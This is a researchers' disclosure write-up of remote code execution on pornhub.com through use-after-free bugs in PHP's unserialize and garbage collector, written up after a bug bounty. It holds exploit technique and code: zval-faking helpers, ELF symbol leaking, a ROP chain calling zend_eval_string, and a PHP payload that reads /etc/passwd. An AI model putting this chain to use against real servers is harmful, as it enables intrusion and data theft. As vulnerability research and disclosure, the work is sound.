How we broke PHP, hacked Pornhub and earned $20,000

It all started by auditing Pornhub, then PHP and ended in breaking both…

tl;dr:

We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone.

We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm.

Those vulnerabilities were remotely exploitable via PHP’s unserialize function.

We were also awarded $2,000 by the Internet Bug Bounty committee (cf. Hackerone).

Credits:

This project was realized by Dario Weißer (@haxonaut), cutz and Ruslan Habalov (@evonide).
Many thanks go out to cutz for co-authoring this article.

Pornhub’s bug bounty program and its relatively high rewards on Hackerone caught our attention. That’s why we have taken the perspective of an advanced attacker with the full intent to get as deep as possible into the system, focusing on one main goal: gaining remote code execution capabilities. Thus, we left no stone unturned and attacked what Pornhub is built upon: PHP.

Standard exploitation techniques rely on so-called Property-Oriented Programming (POP), which involves abusing already existing classes with specifically defined “magic methods” in order to trigger unwanted and malicious code paths. Unfortunately, it was difficult for us to gather any information about the frameworks Pornhub used, or about its PHP objects in general. We tested multiple classes from common frameworks, all without success.

Bug description

The core unserializer alone is relatively complex, as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. Because it supports structures like objects, arrays, integers, strings and even references, it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, no vulnerabilities of this type were known for newer PHP versions like PHP 5.6 or PHP 7, not least because unserialize had already received a lot of attention in the past (e.g. phpcodz). Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. After so much attention and so many security fixes its vulnerability potential should have been drained and it should be secure, shouldn’t it?

Fuzzing unserialize

To find an answer, Dario implemented a fuzzer crafted specifically for generating serialized strings that were then passed to unserialize. Running the fuzzer with PHP 7 immediately led to unexpected behavior. This behavior was not reproducible when tested against Pornhub’s server, though. Thus, we assumed a PHP 5 version.

However, running the fuzzer against a newer version of PHP 5 just generated more than 1 TB of logs without any success. Eventually, after putting more and more effort into fuzzing, we stumbled upon unexpected behavior again. Several questions had to be answered: is the issue security related? If so, can we only exploit it locally or also remotely? To further complicate the situation, the fuzzer generated non-printable data blobs with sizes of more than 200 KB.

Analyzing unexpected behavior

A tremendous amount of time was necessary to analyze potential issues. In the end, we were able to extract a concise proof of concept of a working memory corruption bug: a so-called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, a deeper understanding of the problem’s root causes and a lot of hard work, we found a similar use-after-free vulnerability that seemed promising for remote exploitation.

Exploitation

Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.
Since our main goal was to execute arbitrary code we needed to somehow compromise the CPU’s instruction pointer referred to as RIP on x86_64. This usually involves the following obstacles:

The stack and heap (which also include any potential user-input) as well as any other writable segments are flagged non-executable (c.f. Executable space protection).

Even if you are able to control the instruction pointer you need to know what you want to execute i.e. you need to have a valid address of an executable memory segment. For this it is common to call the libc function system which will execute a shell command. In PHP context it is often enough to execute zend_eval_string which usually gets executed e.g. when you write “eval(‘echo 1337;’);” in a PHP script i.e. it allows us to execute arbitrary PHP code without having to transition into other involved libraries.

The first problem can be overcome by using Return-oriented programming (ROP), where you utilize already existing and executable memory fragments from the binary itself or its libraries. The second problem, however, requires finding the correct address of zend_eval_string. Usually, when a dynamically linked program gets executed the loader will map the process to 0x400000, which is the standard load address on x86_64. In case you somehow already obtained the correct PHP executable (e.g. by finding the exact package that is shipped by the target) you can just look up the offset of any function you want locally. We discovered that Pornhub was using a custom-compiled version of php5-cgi, which made it difficult to determine the exact PHP version or to get any information at all about the memory layout of the whole PHP process.

Leaking the PHP binary and required pointers

Exploiting use-after-frees in PHP usually follows the same rules. As soon as you’re able to fill freed memory that later on gets reused as an internal PHP variable (a so-called zval), you can generate vectors that allow reading from arbitrary memory as well as triggering code execution.

Preparing the memory disclosure

As previously mentioned we were required to obtain more information about Pornhub’s PHP binary. Therefore, the first step was to abuse the use-after-free to inject a zval that represents a PHP string. The definition of the zval structure looks like the following for PHP 5.6:

"Zend/zend.h"
[...]
struct _zval_struct {
    zvalue_value value;      /* value */
    zend_uint refcount__gc;
    zend_uchar type;         /* active type */
    zend_uchar is_ref__gc;
};

The zvalue_value field, in turn, is defined as a union, which makes type juggling (and type confusion) easily possible.

"Zend/zend.h"
[...]
typedef union _zvalue_value {
    long lval;               /* long value */
    double dval;             /* double value */
    struct {
        char *val;
        int len;
    } str;
    HashTable *ht;           /* hash table value */
    zend_object_value obj;
    zend_ast *ast;
} zvalue_value;

A PHP variable of type string is a zval of type 6. Consequently, it treats the union as a structure that contains a char pointer and a length field. So crafting a string zval with an arbitrary starting point and arbitrary length creates a powerful infoleak that gets triggered when Pornhub’s setcookie() reflects the injected zval in the response header.
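To make the layout concrete, here is a minimal Python sketch of how the bytes of such a string zval could be arranged. It assumes a 64-bit little-endian build of PHP 5.6 with natural C struct padding (24 bytes per zval); the helper name pack_string_zval and the example address are hypothetical and only serve as illustration.

```python
import struct

IS_STRING = 6  # zval type id for strings in PHP 5.x

# Assumed layout on x86_64 (little-endian, natural alignment):
#   char *val (8) | int len (4) | 4 bytes union padding |
#   zend_uint refcount__gc (4) | zend_uchar type (1) |
#   zend_uchar is_ref__gc (1) | 2 bytes tail padding
ZVAL_FORMAT = "<QI4xIBB2x"


def pack_string_zval(address, length, refcount=1):
    """Return the raw bytes of a string zval whose value starts at `address`."""
    return struct.pack(ZVAL_FORMAT, address, length, refcount, IS_STRING, 0)


zval = pack_string_zval(0x400000, 0x400)
print(len(zval))   # 24
print(zval.hex())
```

Whoever interprets these 24 bytes as a zval sees a string of 0x400 bytes that starts at 0x400000, which is exactly what turns a reflected value into a read primitive.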

Finding PHP’s image base

Usually, one can start by leaking the binary, which as stated before, begins at 0x400000. Unfortunately, Pornhub’s server used protection mechanisms like PIE and ASLR which randomize the image base of the process and its shared libraries. This also has become the default as more and more distributions ship packages that enable position independent code.

The next challenge was on: finding the correct loading address of the binary.

The first difficulty was to somehow obtain a single valid address we could start leaking from. Here it was helpful to know some details about PHP’s internal memory management. In particular, once a zval is freed PHP will overwrite its first eight bytes with the address of the previously freed chunk. Hence, a trick to obtain a first valid address is to create an integer zval, free this integer zval and finally use a dangling pointer to this zval to obtain its current value.

Since php-cgi implements multiple workers that simply get forked from a master process, the memory layout never really changes between different requests, as long as you keep sending data of the same size. That’s also why we could send request after request, each time leaking a different portion of memory by letting the fake zval string begin at different addresses. However, obtaining the heap address of a freed chunk is by itself not enough to get any clues about the location of the executable, because there is no useful information in the surroundings of that chunk.

To get interesting addresses, there is a relatively complicated technique which requires multiple frees and allocations of PHP structures during the unserialization process (c.f. ROP in PHP applications Slide 67). Due to the nature of our bug and to keep the complexity as low as possible we have used our own trick.

By using a serialized string like “i:0;a:0:{}i:0;a:0:{}[…]i:0;a:0:{}” as part of our overall unserialize payload we could force unserialize to create many empty arrays and free them once it terminated. When initializing an array PHP consecutively allocates memory for its zval and hashtable. One default hashtable entry for empty arrays is the uninitialized_bucket symbol. Overall, we were able to obtain a memory fragment that looked similar to the following:

0x7ffff7fc2fe0: 0x0000000000000000 0x0000000000eae040
[...]
0x7ffff7fc3010: 0x00007ffff7fc2b40 0x0000000000000000
0x7ffff7fc3020: 0x0000000100000000 0x0000000000000000
0x7ffff7fc3030: # <--------- This address was leaked in a previous request.
0x7ffff7fc3040: 0x00007ffff7fc2f48 0x0000000000000000
0x7ffff7fc3050: 0x0000000000000000 0x0000000000000000
[...]
0x7ffff7fc30a0: 0x0000000000eae040 0x00000000006d5820
(gdb) x/xg 0x0000000000eae040
0xeae040 <uninitialized_bucket>: 0x0000000000000000

The address 0xeae040 is the address of PHP’s uninitialized_bucket symbol and points directly into PHP’s BSS segment. You can see that it occurs multiple times in the neighborhood of the most recently freed chunk. As stated before, many empty arrays were freed. Thus, by abusing the fact that some hashtable entries remained unchanged in the heap we were able to leak this specific symbol.

Finally, we could apply a page-wise backwards scan starting from the uninitialized_bucket symbol address to find the ELF header:

$start &= 0xfffffffffffff000;
$pages += 0x1000 while leak($start - $pages, 4) !~ /^\x7fELF/;
return $start - $pages;
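The same backwards scan can be tried out offline. The following Python sketch runs it against a simulated memory region; the names find_image_base and fake_leak, the max_pages safety bound and all addresses are assumptions made for this illustration and are not part of the original exploit.

```python
PAGE_SIZE = 0x1000
ELF_MAGIC = b"\x7fELF"


def find_image_base(leak, start, max_pages=0x10000):
    """Scan backwards page by page from `start` until the ELF magic is found.

    `leak(address, size)` is a hypothetical read primitive returning bytes.
    """
    page = start & ~(PAGE_SIZE - 1)  # round down to the page boundary
    for _ in range(max_pages):
        if leak(page, 4) == ELF_MAGIC:
            return page
        page -= PAGE_SIZE
    raise LookupError("ELF header not found within max_pages")


# Simulated memory: an "image" mapped at 0x555000 with the magic at its start.
BASE = 0x555000
memory = bytearray(0x5000)
memory[0:4] = ELF_MAGIC


def fake_leak(address, size):
    offset = address - BASE
    if offset < 0 or offset + size > len(memory):
        return b""  # treated as unmapped in this simulation
    return bytes(memory[offset:offset + size])


print(hex(find_image_base(fake_leak, BASE + 0x4e40)))  # 0x555000
```

Because ELF images are mapped at page-aligned addresses, checking only the first four bytes of each page is sufficient.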

Leaking interesting PHP binary segments

At this point things got more complicated, as we were only able to leak 1 KB of data per request (this is due to header size limitations enforced by Pornhub’s web server). A PHP binary can take up to about 30 MB. Assuming one request per second, leaking it completely would have taken about 8 hours and 20 minutes. As we were afraid that our exploitation process could get interrupted at any time, it was essential to act as fast and as stealthily as possible. This is why we had to implement some heuristics to guess and filter likely interesting sections in advance. Nevertheless, we could resolve any structure that was referenced in the ELF’s string and symbol table. There are other techniques like ret2dlresolve that allow omitting the whole leaking process, but they weren’t entirely applicable here since they require crafting more data structures and knowledge about different memory locations.
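The time estimate follows from simple arithmetic, which this short Python sketch reproduces. It assumes decimal units (30 MB = 30,000,000 bytes, 1 KB = 1,000 bytes); the function name is made up for this example.

```python
def full_leak_duration(binary_size, bytes_per_request, seconds_per_request=1):
    """Return (requests, hours, minutes) needed to leak the whole binary."""
    requests = -(-binary_size // bytes_per_request)  # ceiling division
    total_seconds = requests * seconds_per_request
    hours, remainder = divmod(total_seconds, 3600)
    return requests, hours, remainder // 60


# Decimal units: 30 MB = 30,000,000 bytes and 1 KB = 1,000 bytes.
print(full_leak_duration(30_000_000, 1_000))  # (30000, 8, 20)
```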

To get the address of zend_eval_string you first have to find the ELF program headers, whose offset is stored at offset 32 of the ELF header (the e_phoff field), then scan forward until you find a program header entry of type 2 (PT_DYNAMIC) to get the ELF’s dynamic section. This section finally contains references to the string and symbol tables (types 5 and 6, i.e. DT_STRTAB and DT_SYMTAB), which you can dump completely by using their size fields in order to grab any function whose virtual address you desire. Alternatively, you can also use the hashtable (DT_HASH) to find functions more quickly, but in this scenario it doesn’t matter much since you can quickly traverse the tables locally anyway. In addition to zend_eval_string we were interested in further symbols and the location of our POST variables (because they were supposed to be used as a ROP stack later on).
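The walk through the headers can be sketched in a few lines of Python. This is only an illustration under stated assumptions: a 64-bit little-endian ELF, a hypothetical read(address, size) primitive, and p_vaddr interpreted relative to the image base (as for a position independent executable). Whether the returned table addresses are absolute or relative depends on the loader, so the sketch returns them unmodified.

```python
import struct

PT_DYNAMIC = 2
DT_NULL, DT_STRTAB, DT_SYMTAB = 0, 5, 6


def find_dynamic_tables(read, base):
    """Locate the DT_STRTAB and DT_SYMTAB entries of an ELF64 image.

    `read(address, size)` is a hypothetical read primitive returning bytes;
    `base` is the load address of the image.
    """
    # ELF64 header: e_phoff at offset 32, e_phentsize at 54, e_phnum at 56.
    (e_phoff,) = struct.unpack("<Q", read(base + 32, 8))
    e_phentsize, e_phnum = struct.unpack("<HH", read(base + 54, 4))

    dynamic = None
    for i in range(e_phnum):
        entry = read(base + e_phoff + i * e_phentsize, 56)
        p_type, _flags, _offset, p_vaddr = struct.unpack_from("<IIQQ", entry)
        if p_type == PT_DYNAMIC:
            dynamic = base + p_vaddr  # assumption: position independent image
            break
    if dynamic is None:
        raise LookupError("no PT_DYNAMIC program header")

    # Each dynamic entry is a (d_tag, d_val) pair of 16 bytes; DT_NULL ends it.
    tables = {}
    address = dynamic
    while True:
        d_tag, d_val = struct.unpack("<qQ", read(address, 16))
        if d_tag == DT_NULL:
            break
        if d_tag in (DT_STRTAB, DT_SYMTAB):
            tables[d_tag] = d_val
        address += 16
    return tables
```

With both table addresses known, symbol names can be matched against the string table and the corresponding symbol values read from the symbol table.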

Leaking the address of our POST data

To get the address of the supplied POST data you can just leak some more pointers by reading from:

Traversing this chain looks complicated, but you just need to dereference a few pointers with the correct offset and you’ll quickly find the stdin:// stream which points to the POST data inside the heap.

Preparing the ROP payload

The second part deals with actually taking control over the PHP process and gaining code execution. For this to happen we need to discuss how one can modify the instruction pointer first.

Taking over the instruction pointer

We adjusted our payload to contain a fake object (instead of the previously used string zval) with a pointer to a specially crafted zend_object_handlers table. This table is, in its essence, an array of function pointers whose structure definition can be found in:

"Zend/zend_object_handlers.h"
[...]
struct _zend_object_handlers {
    zend_object_add_ref_t add_ref;
    [...]
};

When creating such a fake zend_object_handlers table we can simply set up add_ref however we prefer. The function behind this pointer usually handles incrementing the object’s reference counter. Once our created fake object gets passed as a parameter to “setcookie” the following things happen:

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

"Zend/zend_variables.c"
[...]
ZEND_API void _zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)
{
    [...]
    case IS_OBJECT:
        {
            TSRMLS_FETCH();
            Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);
            [...]
}

In particular, this will make a call to the provided add_ref function with the address of our object as a parameter (c.f. PHP Internals Book – Copying zvals to see an explanation). The corresponding assembly looks like:

<_zval_copy_ctor_func+288>: mov 0x8(%rdi),%rax
<_zval_copy_ctor_func+292>: callq *(%rax)

Here, RDI is the first argument to the _zval_copy_ctor_func function which also is the address of our fake object zval (zvalue in the source code above). As previously seen in the definition of the _zvalue_value typedef, an object contains an element called obj of type zend_object_value which is defined as follows:

"Zend/zend_types.h"
[...]
typedef struct _zend_object_value {
    zend_object_handle handle;
    const zend_object_handlers *handlers;
} zend_object_value;

Thus, 0x8(%rdi) will point to the second entry in _zend_object_value which corresponds to the address of our first zend_object_handlers entry. As mentioned before, this entry is our custom add_ref function and explains why we have direct control over RAX, too.
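The offset arithmetic can be checked with a small Python sketch. It assumes the x86_64 layout with natural alignment (a 4-byte handle followed by 4 bytes of padding, so that the handlers pointer sits at offset 8); the constant HANDLERS_TABLE is a placeholder value, not a real address.

```python
import struct

IS_OBJECT = 5  # zval type id for objects in PHP 5.x

# Assumed x86_64 layout of an object zval:
#   zend_object_handle handle (4) | 4 bytes padding |
#   const zend_object_handlers *handlers (8) |
#   refcount__gc (4) | type (1) | is_ref__gc (1) | 2 bytes padding
OBJECT_ZVAL_FORMAT = "<I4xQIBB2x"


def handlers_pointer(zval_bytes):
    """Mimic `mov 0x8(%rdi),%rax`: read the qword at offset 8 of the zval."""
    (pointer,) = struct.unpack_from("<Q", zval_bytes, 8)
    return pointer


# Placeholder value, not a real address.
HANDLERS_TABLE = 0x1122334455667788
zval = struct.pack(OBJECT_ZVAL_FORMAT, 0, HANDLERS_TABLE, 1, IS_OBJECT, 0)
print(hex(handlers_pointer(zval)))  # 0x1122334455667788
```

The subsequent `callq *(%rax)` then dereferences this pointer once more and jumps to whatever is stored in the first slot of the table, which is the add_ref entry.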

To bypass the previously discussed non-executable memory problem we had to obtain further information. In particular, we needed to collect useful gadgets and prepare stack pivoting for our ROP chain since there wasn’t enough control over the stack yet.

Leaking ROP gadgets

Now we could set up the add_ref pointer, or RAX respectively, to take over the instruction pointer. Although this gives you a starting point, it doesn’t ensure that all of your provided ROP gadgets are executed, because the CPU will pop the next instruction’s address from the current stack once it returns from the first gadget. We don’t have any control over this stack, so it was necessary to pivot the stack into our ROP chain. This is why the next step was to copy RAX into RSP and continue ropping from there. Using a locally compiled version of PHP we scanned for good candidates for stack pivoting gadgets and found that php_stream_bucket_split contained the following piece of code:

<php_stream_bucket_split+381>: push %rax               # <------------
<php_stream_bucket_split+382>: sub $0x31,%al
<php_stream_bucket_split+384>: rcrb $0x41,0x5d(%rbx)
<php_stream_bucket_split+388>: pop %rsp                # <------------
<php_stream_bucket_split+389>: pop %r13
<php_stream_bucket_split+391>: pop %r14
<php_stream_bucket_split+393>: retq

This was used to modify RSP so that it points to the ROP chain we supplied via POST data, effectively chaining all provided gadget calls.

According to the x86_64 calling convention the first two parameters of a function are passed in RDI and RSI, so we had to find a pop %rdi and a pop %rsi gadget, too. Those are pretty common and thus easily found. However, we still had no idea whether those gadgets actually existed in Pornhub’s version of PHP. Therefore, we had to manually verify their presence.

Verifying the presence of the required ROP gadgets

The infoleak vector allowed us to quickly dump the disassembly of php_stream_bucket_split and check if our stack pivoting gadget was available in the remote version. Fortunately, only minor corrections of the gadgets’ offsets were necessary. Finally, we implemented some checks to confirm that all addresses were correct:

Crafting the ROP stack

The final ROP payload that effectively executed zend_eval_string(code); exit(0); looked like the following snippet:

my $rop = "";
$rop .= pack('Q', $php_base + 0x51a71f);                # pivot rsp
$rop .= pack('Q', 0xdeadbeef);                          # junk
$rop .= pack('Q', $php_base + 0x2b904e);                # pop rdi
$rop .= pack('Q', $post_addr + length($rop) + 8 * 7);   # pointing to $php_code
$rop .= pack('Q', $php_base + 0x50ee0c);                # pop rsi
$rop .= pack('Q', 0);                                   # retval_ptr
$rop .= pack('Q', $zend_eval_string);                   # zend_eval_string
$rop .= pack('Q', $php_base + 0x2b904e);                # pop rdi
$rop .= pack('Q', 0);                                   # exit code
$rop .= pack('Q', $exit);                               # exit
$rop .= $php_code . "\x00";

Because the stack pivot gadget also contains a pop %r13 and a pop %r14, the 0xdeadbeef padding inside the remaining chain was necessary to continue with setting RDI. As the first parameter to zend_eval_string, RDI is required to reference the code that is to be executed. This code is located right after the ROP chain. It was also required to keep sending the exact same amount of data between each request so that all calculated offsets stayed correct. This was achieved by setting up different paddings wherever necessary.

The next step was to finally trigger code execution by returning back into the PHP interpreter. Other techniques like return2libc are applicable as well, but they create a few other problems that are more easily dealt with when staying in the PHP context.
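The pointer arithmetic behind "pointing to $php_code" can be verified in isolation. The Python sketch below uses small placeholder numbers instead of real addresses and a made-up helper name; it only demonstrates why adding the current chain length and 8 * 7 lands exactly on the first byte after the ten-entry chain.

```python
import struct

QWORD = 8


def code_address(post_addr, entries_before, entries_remaining):
    """Address of the PHP code that follows the chain.

    `entries_before` is the number of qwords already appended when the
    pointer is computed; `entries_remaining` counts the pointer itself
    plus every qword that still follows it.
    """
    return post_addr + (entries_before + entries_remaining) * QWORD


# Placeholder values standing in for the leaked addresses.
POST_ADDR = 0x10000
chain = [0x1, 0xdeadbeef, 0x2]                 # pivot, junk, pop rdi
pointer = code_address(POST_ADDR, len(chain), 7)
chain += [pointer, 0x3, 0, 0x4, 0x2, 0, 0x5]   # remaining seven qwords
blob = struct.pack("<10Q", *chain) + b"echo 1337;\x00"

print(pointer - POST_ADDR)         # 80
print(blob[pointer - POST_ADDR:])  # b'echo 1337;\x00'
```

Three qwords precede the pointer and seven follow (including the pointer itself), so the code starts 10 * 8 = 80 bytes after the beginning of the POST data.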

Returning into PHP

Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.

Clean termination of PHP

Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming:

my $php_code = 'eval(\'
    header("X-Accel-Buffering: no");
    header("Content-Encoding: none");
    header("Connection: close");
    error_reporting(0);
    echo file_get_contents("/etc/passwd");
    ob_end_flush();
    ob_flush();
    flush();
\');';

This finally allowed us to directly fetch every output the PHP payload generated without having to worry about the cleanup routines that are usually involved when the CGI process sends data to the web server. This further increased the stealthiness factor by minimizing the number of potential errors and crashes.

To summarize, our payload contained a fake object with its add_ref function pointer pointing to our first ROP gadget. The following diagram visualizes this concept:

[Figure: Final version of the crafted zval object]

Together with our ROP stack which was provided over POST data our payload did the following things:

Created our fake object which was later on passed as a parameter to “setcookie”.

This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.

Our ROP chain then prepared all registers/parameters as discussed.

Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.

Finally, we caused a clean process termination while also fetching the output from the response body.

Once we ran the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would also have been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.

Timeline

Here is the timeline of the disclosure process:

2016-05-30 Hacked Pornhub and submitted the issue over Hackerone. Hours later Pornhub quickly fixed the issue by removing calls to unserialize

2016-06-14 Received a reward of $20,000

2016-06-16 Submitted issues to bugs.php.net

2016-06-21 Both bugs got fixed in PHP’s security repository

2016-06-27 Received Hackerone IBB reward of $2,000 ($1,000 for each vulnerability)

2016-07-22 Pornhub resolved the issue on Hackerone

Conclusion

We gained remote code execution and would’ve been able to do the following things:

Dump the complete database of pornhub.com including all sensitive user information.

Track and observe user behavior on the platform.

Leak the complete available source code of all sites hosted on the server.

Escalate further into the network or root the system.

Of course none of the above things were done and very careful attention was paid to respect the scope and limitations of the bug bounty program.
Further, we were able to find two zero day vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities, although being in a very different PHP context, could be reliably and remotely exploited in an unserialize context, too.

It is well known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses became apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misconception. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.

You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.
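As a rough illustration of the JSON alternative, the following Python sketch parses untrusted cookie data and keeps only fields of the expected type. The function name and the keys "lang" and "autoplay" are hypothetical; in PHP the corresponding building blocks would be json_encode and json_decode.

```python
import json


def load_preferences(raw_cookie):
    """Parse untrusted cookie data as JSON and accept only expected fields."""
    try:
        data = json.loads(raw_cookie)
    except (ValueError, TypeError):
        return {}
    if not isinstance(data, dict):
        return {}
    # Allow-list of hypothetical keys and the types we expect for them.
    expected = {"lang": str, "autoplay": bool}
    return {
        key: data[key]
        for key, kind in expected.items()
        if isinstance(data.get(key), kind)
    }


print(load_preferences('{"lang": "en", "autoplay": true, "x": [1]}'))
# {'lang': 'en', 'autoplay': True}
print(load_preferences('O:8:"stdClass":0:{}'))  # {}
```

JSON can only describe plain data (objects, arrays, strings, numbers, booleans and null), so parsing it never instantiates application classes or resolves references the way unserialize does.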

Actually caring about security (and not just pretending like many other companies do nowadays).

Being very generous regarding the bounty of $20,000.
According to the latest update of Sinthetic Labs’s Public Hackerone Reports, this submission seems to be head to head with the ShellShock vulnerability submission as one of the highest paid public bounties on Hackerone so far, which we are grateful to see.

Further, many thanks go out to the PHP developers for quickly deploying the fix and to the Internet Bug Bounty committee for awarding us $2,000.

Finally, we want to highlight the necessity of such programs. As you can see, offering high bug bounties can motivate security researchers to find bugs in underlying software. This positively impacts other sites and unrelated services as well.

Please don’t forget to check out our two other write-ups regarding the PHP bugs and their discovery.
